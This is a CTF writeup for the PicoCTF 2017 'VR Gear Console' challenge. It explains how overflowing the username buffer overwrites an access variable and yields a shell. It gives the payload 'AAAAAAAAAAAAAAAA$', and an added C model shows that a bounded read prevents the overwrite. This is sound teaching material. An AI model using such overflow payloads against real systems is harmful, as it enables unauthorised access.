Tags: pwn 

https://github.com/Idomin/CTF-Writeups/blob/master/PicoCTF-2017/README.MD

VR Gear Console

Here's the VR gear admin console. See if you can figure out a way to log in. The problem is found here: /problems/51645e84d55d376442beaf264e0908b9

HINTS

- What happens if you read in more characters than the length of the username buffer?
- You should look at an ascii table to see what character you need to choose.
- Numbers are stored in little-endian format, which means that the lowest byte of the number is first.
- "cat file - | vrgearconsole " will keep the pipe open for commands.

Reference : http://www.asciitable.com/

    if (access >= 0xff || access <= 0) {
        printf("Login unsuccessful.\n");
        exit(10);
    } else if (access < 0x30) {
        printf("Admin access granted!\n");
        printf("The flag is in \"flag.txt\".\n");
        system("/bin/sh");
    } else {
        printf("Login successful.\n");
        printf("You do not have permission to access this resource.\n");
        exit(1);
    }

If Username == AAAAAAAAAAAAAAAAAAAAA, for example, the access level will be set to 0x41414141 and we get to the else case.

If Username == AAAAAAAAAAAAAAAAA, we get 0x00000041: the last character lands in the lowest byte of the access level. We need access < 0x30, and the ASCII table shows that $ is hex 24, so let's go with that.

Username == AAAAAAAAAAAAAAAA$ results in a shell.
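
The overwrite described above, modelled as an added example (not code from the challenge or the original writeup): a simulated stack frame shows which access value each username produces and how a bounded read leaves it untouched. The 16-byte buffer size, the 0xff starting value, the frame layout and all function names are assumptions made for this model.

```c
#include <stdint.h>
#include <string.h>

#define NAME_LEN 16        /* assumed buffer size, inferred from the 16 'A's in the payload */
#define ACCESS_INIT 0xffu  /* assumed starting value; it fails the first check */

/* Modelled stack frame: username, then the access word, then spill space. */
struct frame {
    unsigned char username[NAME_LEN];
    unsigned char access[4];   /* little-endian: lowest byte first */
    unsigned char spill[12];   /* keeps long inputs inside the model */
};

enum outcome { LOGIN_FAILED, ADMIN_SHELL, NO_PERMISSION };

/* Same three-way branch as the challenge code above. */
static enum outcome classify(int32_t access) {
    if (access >= 0xff || access <= 0) return LOGIN_FAILED;
    if (access < 0x30) return ADMIN_SHELL;
    return NO_PERMISSION;
}

/* Store input plus NUL in the frame and return the resulting access value.
 * bounded == 0: unbounded read, bytes past username land in access.
 * bounded == 1: fgets(username, NAME_LEN, stdin) semantics, at most
 *               NAME_LEN - 1 bytes plus the terminator. */
int32_t access_after_login(const char *input, int bounded) {
    struct frame f;
    unsigned char *raw = (unsigned char *)&f;
    size_t n = strlen(input);
    size_t limit = bounded ? NAME_LEN - 1 : sizeof f - 1;

    memset(&f, 0, sizeof f);
    f.access[0] = ACCESS_INIT;
    if (n > limit) n = limit;   /* the model itself never writes out of bounds */
    memcpy(raw, input, n);
    raw[n] = '\0';
    return (int32_t)((uint32_t)f.access[0] | (uint32_t)f.access[1] << 8 |
                     (uint32_t)f.access[2] << 16 | (uint32_t)f.access[3] << 24);
}

enum outcome login_outcome(const char *input, int bounded) {
    return classify(access_after_login(input, bounded));
}
```

With the bounded read, the same 17-character input is truncated to 15 bytes and the access value stays at its starting value, so the login fails.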

Original writeup (https://github.com/Idomin/CTF-Writeups/blob/master/PicoCTF-2017/README.MD).